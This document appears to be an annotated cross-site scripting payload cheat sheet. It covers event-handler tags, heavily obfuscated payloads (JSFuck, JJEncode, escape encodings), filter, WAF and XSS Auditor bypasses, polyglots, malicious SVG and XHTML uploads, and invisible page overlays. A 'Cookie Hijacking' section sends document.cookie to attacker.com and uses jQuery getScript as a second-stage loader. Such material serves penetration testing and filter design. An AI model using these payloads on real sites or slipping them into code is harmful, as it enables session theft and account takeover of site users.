## Common Tags
<!-- Common tags. alert(1) is only a marker; use document.domain when you need to prove which origin the code runs in. -->
<img src onerror=alert(1)>
<!-- autofocus + onfocus fires as soon as the element is parsed, no interaction needed -->
<input autofocus onfocus=alert(1)>
<iframe src="javascript:alert(1)"></iframe>
<!-- needs the pointer to pass over the element -->
<p onmouseover="alert(1)">test</p>
<!-- NOTE(review): background= is a legacy attribute; current browsers load it as an image URL and are not expected to run a javascript: value here - verify before relying on it -->
<table background="javascript:alert(1)">
<!-- an image input with an empty src errors like <img> -->
<input type=image src onerror="prompt(1)">
<!-- string arithmetic keeps the payload free of ; and + for filters that strip them -->
<a href="javascript:var a=''-alert(1)-''">link</a>
## Uncommon Tags
<!-- autofocus works on any focusable form control, not only <input> -->
<select autofocus onfocus=alert(1)>
<meter onmouseover=alert(1)></meter>
<!-- NOTE(review): the parser ignores a <frameset> once it has committed to a <body>; this only works when the injection lands before any body content -->
<frameset><frame src="javascript:alert(1)"></frameset>
<!-- an empty src still starts the media load, so loadstart fires without a real file -->
<video src onloadstart=alert(1)>
<!-- open="" makes the toggle event fire immediately on parse -->
<details open="" ontoggle=confirm(document.cookie)></details>
// hidden input: Firefox only - fires when the victim presses the accesskey (Alt+Shift+X); hidden inputs are otherwise neither focusable nor clickable
<input type="hidden" accesskey="X" onclick="alert(1)">
## Custom Tag
<!-- an unknown element made focusable with tabindex; focusin fires only when it receives focus (tab to it, or navigate to #x) - not zero-click on its own -->
<xss id=x tabindex=1 onfocusin=alert(1)>
## Obfuscation
<!-- octal escapes: the string decodes to <svg onload=alert(1)>; a javascript: URL whose result is a string replaces the document with that markup, which then runs -->
<a href="javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'">link</a>
<!-- \uXXXX escapes are legal inside JS identifiers, so this is simply the identifier alert -->
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<!-- ES2015 \u{...} form of the same identifier -->
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
<!-- hex escapes; same decoded payload as the octal one above -->
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<a href=javascript:\u0061\u006C\u0065\u0072\u0074(1)>link</a>
<!-- unobfuscated reference form -->
<a href="javascript:alert(1)">Click</a>
// base64 YWxlcnQoMSk=                       (atob -> alert(1))
// hex    \x61\x6c\x65\x72\x74\x28\x31\x29   (the escaped form was decoded to plain "alert(1)" during extraction; shown re-escaped)
// ascii  97,108,101,114,116,40,49,41        (String.fromCharCode -> alert(1))
// Katakana-identifier obfuscation. Destructuring "[object Object]" gives ウ='o', ア='c';
// "truefalseundefined" gives t,r,u,e,a,l,s,n. ツ spells "constructor", so the line is
// "...".constructor.constructor('alert(-~ウ)')() i.e. Function('alert(1)')()  (-~'o' is 1).
<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
// JJEncode (http://utf-8.jp/public/jjencode.html) - encoder output for alert(1); only $ and _ appear in identifiers
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
// Jsfuck (http://www.jsfuck.com/) - six characters only; expands to []["filter"]["constructor"]("alert(1)")().
// The '(' and ')' are taken from fixed offsets into String([].filter), so it assumes that
// stringification begins "function filter(" (true for current engines).
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
## Filtering
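Dot(.)
// bracket notation with a string key replaces the dot; works for any property path
document.cookie => document['cookie']
DoubleQuote("")
// the call sits in the property-key position: alert(1) is evaluated (and fires) while
// computing eval[...]; no quotes are needed and eval[1] is just undefined afterwards
eval("alert(1)") => eval[alert(1)]
// A RegExp literal carries the URL without quotes. NOTE(review): RegExp#toString keeps the
// delimiters, so assigning the RegExp itself produced "/http:\/\/www.test.com/" - a relative
// path on the current origin, not a redirect. .source is required; browsers following the
// WHATWG URL parser then treat the escaped "\/" as "/" for http(s).
location.href="http://www.test.com"; => location.href=/http:\/\/www.test.com/.source;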
String
// fromCharCode builds "alert(1)" from code points when letters or quotes are filtered
eval(String.fromCharCode(97,108,101,114,116,40,49,41))
without ,
eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41))
shorten with parseInt("alert",30) == 8680439
// 8680439..toString(30) === "alert" (the double dot: the first one is the number's decimal point)
eval(8680439..toString(30)+String.fromCharCode(40,49,41))
without +
eval(8680439..toString(30).concat(String.fromCharCode(40,49,41)))
without ,
eval(8680439..toString(30).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
semicolon(;) and Addition operator(+)
// arithmetic operators glue the payload to the surrounding string literals without ; or +
'abc'-alert(1)-'def'
// ^1&&'...' turns the NaN result into 1, so the whole expression still yields the original
// string and the host page keeps working after the alert
'abc'-alert(1)^1&&'normal_string_here'
// presumably the trailing */ closes a host-page comment the injection landed in - drop it otherwise
'abc'-eval[alert(document['cookie'])]^1&&'normal_string_here'*/
// document.location.href = 'abc?param1=haha'-eval[alert(document['cookie'])]^1&&'https://hck.com/';
Parentheses( () )
// tagged template: alert receives the array ["1"], which displays as 1
alert`1`
// Set.constructor is Function; Function`alert(1)` builds the function and the empty template `` invokes it
Set.constructor`alert(1)```
// hex encoding
// escapes are "cooked" in the template, so the function body already contains ( )
Set.constructor`alert\x281\x29```
// backslash
Set.constructor`alert\`1\````
// SetTimeout
// setTimeout stringifies a non-function first argument, so the template array becomes code (string timers need 'unsafe-eval' under CSP)
setTimeout`alert\u00281\u0029`
// Function
// `new` invokes the function returned by the tagged template - no () needed
new Function`alert(1)`
Function`alert(1)```
Function`alert\x281\x29```
Function`alert\`1\````
// DOM Object (top, self, window, parent, frame, globalThis)
// property lookup with a template / escaped string key, then a tagged-template call
top[`alert`]``
window[`alert`]``
top['\141\154\145\162\164']``
window['\x61\x6c\x65\x72\x74']``
Quote("", '')
// RegExp Object
// a RegExp literal carries text without quotes; alert(/1/) shows "/1/", .source drops the slashes
alert(/1/)
alert(/1/.source)
// base64 inside a RegExp literal, decoded with atob
eval(atob(/YWxlcnQoMSk=/.source))
// find calls alert(1, 0, [1]); only the first argument is displayed
[1].find(alert)
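Quote and Parentheses
// Error Handler
// NOTE(review): throw is a statement, not an expression, so it cannot follow a comma -
// `window.onerror=alert,throw 1` is a SyntaxError. A semicolon (or newline) is required;
// alert is then invoked as the error handler with the message string as its first argument.
window.onerror=alert;throw 1
// Attribute on HTML Tag with Entity
// the parentheses are numeric character references; the HTML parser decodes them before the
// handler is compiled (the extracted page showed them already decoded as alert(1))
<svg onload=alert&#40;1&#41;>
<iframe onload=alert&#40;1&#41;>
// append body
// '<' and '>' come from document.head.outerHTML ("<head>..."), '(' and ')' from String(URL)
// ("function URL() { [native code] }": indices 14/15 after the two prefix chars). The offsets
// depend on the engine's native-function toString layout.
_=document.head.outerHTML[0]+document.head.outerHTML[5]+URL
document.body.innerHTML=_[0]+/iframe onload=alert/.source+_[14]+1+_[15]+_[1]
// Symbol.hasInstance
// `x instanceof obj` calls obj[Symbol.hasInstance](x); with eval as that hook the left-hand
// string "alert(1)" is evaluated. _[12]/_[13] are '(' and ')' of String(URL).
_=URL+0
/alert/.source+_[12]+1+_[13]instanceof{[Symbol.hasInstance]:eval}
// no curly bracket
_=URL+0
Array.prototype[Symbol.hasInstance]=eval,/alert/.source+_[12]+1+_[13]instanceof[]
// no slash
// "function URL() { [native code] }truefalse": a=19 l=38 e=40 r=33 t=4 (=12 )=13
_=URL+!0+!1,Array.prototype[Symbol.hasInstance]=eval,_[19]+_[38]+_[40]+_[33]+_[4]+_[12]+1+_[13]instanceof[]
// Symbol.toPrimitive
// onload receives the Event; overriding its ToPrimitive makes alert(event) display 1
Event.prototype[Symbol.toPrimitive]=x=>1,window.onload=alert
// location.search (page.php?0:alert(1)//&...)
// open(event) coerces the event to "javascript:0?0:alert(1)//..." - the query string supplies the code
Event.prototype[Symbol.toPrimitive]=x=>/javascript:0/.source+location.search,onload=open
// eval with jQuery
// NOTE(review): [CSS+0][0][12]/[13] assume String(CSS) begins "function CSS(" as in older
// Chromium; current browsers stringify the CSS namespace as "[object CSS]", where those
// indices are not '(' and ')'. Verify in the target browser, or build them from URL+0 as above.
Event.prototype[Symbol.toPrimitive]=x=>/alert/.source+[CSS+0][0][12]+1+[CSS+0][0][13],window.onload=$.globalEval
// function to String
location=/javascript:alert/.source+[CSS+0][0][12]+1+[CSS+0][0][13]
// location.search (page.php?0:alert(1)//&...)
// NOTE(review): the original `/javascript:/+0+location.search` stringified the RegExp with its
// delimiters ("/javascript:/0?..."), a relative path that never reaches the javascript: scheme;
// .source is required, matching the Symbol.toPrimitive variant above.
location=/javascript:/.source+0+location.search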
Native Function
// alias the native function so the token "alert" never appears at the call site
var a=alert; a(document.cookie);
// document.cookie bypass
// the blocked string is split so no fragment matches a keyword filter; eval joins it back
var a='alert'; var b='(documen'; var c='t.cooki'; var d='e)'; var e=eval; e(a+b+c+d);
// String bypass
// atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ==") === "alert(document.cookie)"
var a=eval; a(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="));
// \ bypass (two injection points): the backslash in a's value escapes its closing quote, so the
// literal swallows everything up to the quote in b's slot and the remainder runs as code
var a='\'; var b=';alert(document.cookie);var z='';
// () bypass
// btoa.constructor is Function - the same tagged-template trick as Set.constructor above
btoa.constructor`alert\x28document.cookie\x29```
## XSS in JS Context
// Breaking out of an existing JavaScript context (value reflected inside a script).
// the leading - keeps the expression valid when the payload lands between two operands
-(confirm)(document.domain)//
// reflected as a bare statement
; alert(1);//
// reflected inside a '...' literal: close it with arithmetic rather than ; so the statement stays valid
'-alert(document.domain)-'
';alert(document.domain)//
// when the app backslash-escapes quotes: our own backslash escapes the escape, leaving the quote live
\';alert(document.domain)//
## div Payload
<!-- Pointer events cover mouse, pen and touch; all of them need the pointer to reach the element.
     "MOVE HERE" is just visible bait - make the div cover the viewport (see the overlay payloads further down) to raise the odds. -->
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
## Comment
<!-- the HTML comment opener inside script data moves the tokenizer into the "escaped" state, and the JS engine treats it as a line comment (Annex B HTML-like comments), so alert(1) runs and the rest of the line is ignored -->
<script>alert(1)<!-- test --></script>
## Length bypass (XSS in 20 chars)
<!-- 20-character payloads. The empty tagged template `` stands in for () -->
<svg/onload=alert``>
<!-- unclosed <script src>: the parser closes it at end of document and the external script still loads; // inherits the page's scheme -->
<script src=//aa.es>
<!-- ℡ and ㏛ are Unicode compatibility characters; IDNA/NFKC maps the host to telsr.pw while the visible payload stays short -->
<script src=//℡㏛.pw>
## Injecting inside an HTML tag
<!-- breaking out of a double-quoted attribute value: the leading " closes it, x=" swallows the original closing quote -->
" autofocus onfocus=alert(document.domain) x="
<!-- Style events -->
<!-- NOTE(review): animationstart/animationend only fire for a running animation, so an @keyframes rule named x must already exist on the page (add <style>@keyframes x{}</style> when you control markup) -->
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>
# Payload that injects a full-page overlay (50% black here; set the alpha to 0 for an invisible one) whose handler fires when anywhere on the page is clicked:
<!-- position:fixed with all four edges at 0 and a high z-index puts the div above everything, so any click lands on it; it also blocks normal interaction with the page underneath -->
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
# Same overlay, fully transparent, firing when the mouse moves anywhere over the page (no click needed, only pointer movement):
<!-- alpha 0 makes the overlay invisible; onmouseover fires on the first pointer movement. It still intercepts every click on the page, which a user may notice -->
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
## Loop in a Line
// Computed key: the property access coerces x with toString, which calls alert(1) and then
// `|x` coerces x again - an endless alert loop that ends only when the stack overflows.
0[x={toString:x=>alert(1)|x}]
## URL Encoding
<!-- the javascript: URL is percent-decoded before it is evaluated; useful when the raw letters of "alert" are filtered -->
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
## Sandbox XSS
<!-- nested data: document. NOTE(review): a data: URL gets an opaque (unique) origin, so code in it cannot read the embedding page's DOM or cookies - this proves execution only -->
<iframe src="data:text/html,<iframe
src=JavaScript:alert(1)>"></iframe>
## Operator
// "apple" stands for the host string the payload is reflected next to. alert(1) is evaluated as an
// operand before the operation itself, so it fires even when the operation then throws a TypeError.
"apple"(alert(1))
"apple"[alert(1)]
"apple";alert(1)
"apple"+alert(1)
"apple"-alert(1)
"apple"*alert(1)
"apple"/alert(1)
"apple"&alert(1)
"apple"^alert(1)
"apple"%alert(1)
// in operator (when " is usable but operators, newline characters, etc. are not)
"apple"[alert(1)]in"mango"
"apple"(alert(1))in"mango"
## Character Escape Sequences
The HTML character references in this table were decoded to a literal < when the page was extracted, so every row showed only "<". The standard encodings of U+003C are reconstructed below: the named reference, decimal with 0-5 leading zeros, and hex in every case combination, each with and without the trailing semicolon. All of them decode to < in HTML text and attribute values (the semicolon-less forms only when not followed by an alphanumeric or =). The \x / \u forms apply only inside JavaScript strings, and %3C only inside URLs.
<
%3C
&lt &lt; &LT &LT;
&#60 &#060 &#0060 &#00060 &#000060 &#0000060
&#60; &#060; &#0060; &#00060; &#000060; &#0000060;
&#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c
&#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c;
&#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C
&#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C;
&#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c
&#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c;
&#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C
&#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C;
\x3c \x3C
\u003c \u003C
## Delimiters
Bytes the HTML tokenizer accepts between a tag name and its first attribute. The byte itself is invisible in the rendered rows: %0c's form feed was dropped during extraction (leaving "svgonload"), and %0a/%0d render as line breaks. %09 (tab), %0a (LF), %0c (FF) and %0d (CR) are tag whitespace; %2f works because a "/" before an attribute is tolerated by the tokenizer.
%2f : <svg/onload=alert(1)>
%09 : <svg onload=alert(1)>
%0a : <svg
onload=alert(1)>
%0c : <svgonload=alert(1)>
%0d : <svg
onload=alert(1)>
## Alert Bypass
// Ways to reach alert when the literal token "alert(" (or alert itself) is filtered.
<SCRIPT> _=alert,_(1)</SCRIPT>
`` //Can be used as parentheses: f`x` is a tagged-template call and passes ["x"] without ( )
// NOTE(review): this alerts the literal text "document.cookie" - a tagged template does not
// evaluate its body; use alert`${document.cookie}` to get the value
alert`document.cookie`
alert(document['cookie'])
// with() resolves bare names against the object, so "document.cookie" is never written out
with(document)alert(cookie)
eval('ale'+'rt(1)')
(alert)(1)
// the `in` right operand is only checked after alert fires; the resulting TypeError is harmless
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
// global-object aliases; in a top-level, non-strict script they all resolve to the same window
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
// content: legacy Firefox-only alias of window
content['alert'](6)
// array iteration callbacks receive the element as their first argument
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
// property name assembled from RegExp sources / from a base-30 number (8680439 -> "alert")
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
// Function and string timers take code as a string (they need 'unsafe-eval' under CSP)
Function("ale"+"rt(1)")();
// cooked escape: "al\ert" is "alert"; `new` invokes the function the tagged template returns
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
// eval reached through this[...] with the name split; y = eval('alert(1)') alerts, then eval(y) again
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
// key is ""+"eva"+""+"l" ((/x/,new Array) is the comma operator); alert(1) fires while the argument is built
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
// [].constructor.constructor is Function
[].constructor.constructor('alert()')()
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
// the comma operator yields its last operand
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
// \u0065 is a legal escape inside an identifier
al\u0065rt(1)
al\u0065rt`1`
// octal / hex escapes inside the string key
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
//`alert${indexedDB}` - note: a plain template literal only builds a string; it calls nothing
## Polyglots
<!-- one string that is valid in several contexts: as a javascript: URL; inside a JS /* */ comment (the /* ... */ pair); it closes title/style/textarea/script/xmp so the <svg/onload> lands in HTML text; and the quote/regex juggling keeps alert(1) reachable from inside a JS string -->
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
## XSS via File Upload
<?xml version="1.0" ?>
<!-- XHTML upload: a file served as application/xhtml+xml (or text/xml) runs this script when opened directly. The impact depends on the upload host sharing the application's origin; files served from a separate or sandboxed domain cannot reach the app's cookies or DOM. -->
<html xmlns="http://www.w3.org/1999/xhtml">
<script>alert(1)</script>
</html>
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--
<!-- SVG scripts run when the file is opened as a document (direct URL, <iframe>, <object>, <embed>); they do NOT run when the SVG is referenced from <img> or CSS. Same origin caveat as the XHTML case above. -->
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>
<?xml version="1.0" standalone="no"?>
<!-- same payload with a visible shape, so the file also passes a "does it render?" check -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
## Attribute Referencing
<!-- The handler reads its code from a sibling attribute, so the event attribute itself never contains "alert".
     %0a makes the URL unparsable, so img.src returns the raw attribute value; decodeURI yields "//p6.is<LF>alert(1)//" and the first line is just a comment -->
<img src=//p6.is%0aalert(1)// onerror=eval(decodeURI(src))>
<!-- "x:" parses as a JS label, so eval(src) runs alert(1) -->
<img src=x:alert(1); onerror=eval(src)>
<!-- code in alt (rarely filtered); src only has to be something that fails to decode as an image -->
<img src=http://p6.is onerror=eval(alt) alt=alert(1)>
<!-- base64 in alt, decoded with atob -->
<img src alt=YWxlcnQoMSk= onerror=eval(atob(alt))>
## Bypass Chrome XSS Auditor
// Chrome XSS Auditor bypasses. NOTE(review): the Auditor was removed in Chrome 78 (2019); these
// are historical and only matter against legacy browsers or similar reflective filters.
// when the reflected parameter ends with a backtick
`><img src onerror=`${alert(1)}
// two consecutive parameters: the payload is split across a and b so neither reflection alone looks like script
a=<script>"&b=";alert(1)</script>
a=<script>`&b=`-alert(1)</script>
a=<script>"\&b=";alert(1)</script>
// the same parameter reflected twice
a=`;alert(1)</script><script>`
## Whitelisted Iframe
<!-- srcdoc takes precedence over src (src becomes a fallback only), so a src-based whitelist is bypassed; the srcdoc document inherits the embedding page's origin, so this is full XSS, not a sandbox -->
<iframe src="http://youtube.com/" srcdoc="<img src onerror=alert(1)>"></iframe>
## Redirection
<!-- redirect from an event handler; a protocol-relative // target inherits the current scheme -->
<img src onerror=location=`//www.example.com`>
//meta tag
<!-- no script needed: a meta refresh is a navigation, not governed by a script-src CSP -->
<meta http-equiv="refresh" content="0; url=http://example.com/">
## Cookie Hijacking
// Cookie exfiltration. Only cookies without HttpOnly are visible to document.cookie.
// Use encodeURIComponent(document.cookie) so ; and = survive the query string, and an https
// collector when the victim page is https (mixed-content blocking would otherwise drop the request).
(new Image).src="http://attacker.com/?q=" + document.cookie;
// the request is sent even though the cross-origin response is then blocked by CORS
fetch('http://attacker.com/?q=' + document.cookie)
// with jQuery
$.get('https://attacker.com/?q=' + document.cookie)
// getScript also executes whatever the collector returns - doubles as a second-stage loader
$.getScript("//attacker.com/?q="+document.cookie)
## Data URL Wrapper
<!-- data: URLs carry the payload inline. A script-src CSP that does not allow data: blocks the script form;
     iframe/object/embed data: documents get an opaque origin, so they cannot touch the host page (execution proof only).
     Base64: YWxlcnQoMSk= is alert(1); PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+ is <svg/onload=alert(1)> -->
<script src="data:;base64,YWxlcnQoMSk="></script>
<iframe src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"></iframe>
<object data='data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+'></object>
<embed src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"></embed>
## Variables that lead to DOM XSS (sources)
// DOM XSS sources the attacker controls through a crafted link. Anything after # (location.hash,
// and the full URL forms that include it) is never sent to the server, so server-side filtering
// and WAFs do not see it. Other common sources: window.name, document.baseURI, postMessage event.data.
document.URL
document.referrer
location
location.href
location.search
location.hash
location.pathname
## Bypass with a trusted-looking URL
<!-- the "//example.kr/" part is a JS line comment; %0a ends it and alert(1) runs. Naive host checks and history entries only see the trusted-looking domain -->
<a href="javascript://example.kr/%0aalert(1)">click</a>
## A-tag XSS without interaction
// works on chrome
<!-- fragment navigation to #xss focuses the matching named anchor, so onfocus fires without a click; the attacker only appends #xss to the URL the victim opens -->
<a href=# name=xss onfocus=alert(1)>
http://p6.is/endpoint?...#xss
Reference
- https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
- https://blog.p6.is/xss-cheatsheet/
- https://99-99pit.tistory.com/4
- https://medium.com/@man.shum546/xss-payload-2018-5271c5e3bbce
- http://cubalo.github.io/blog/2014/01/04/bypassing-xss-filters-using-data-uris/
- https://www.hahwul.com/2018/03/29/bypass-xss-protection-event-handler/
- https://blog.rubiya.kr/index.php/2019/03/28/browsers-xss-filter-bypass-cheat-sheet/
- https://jjadmin.tistory.com/24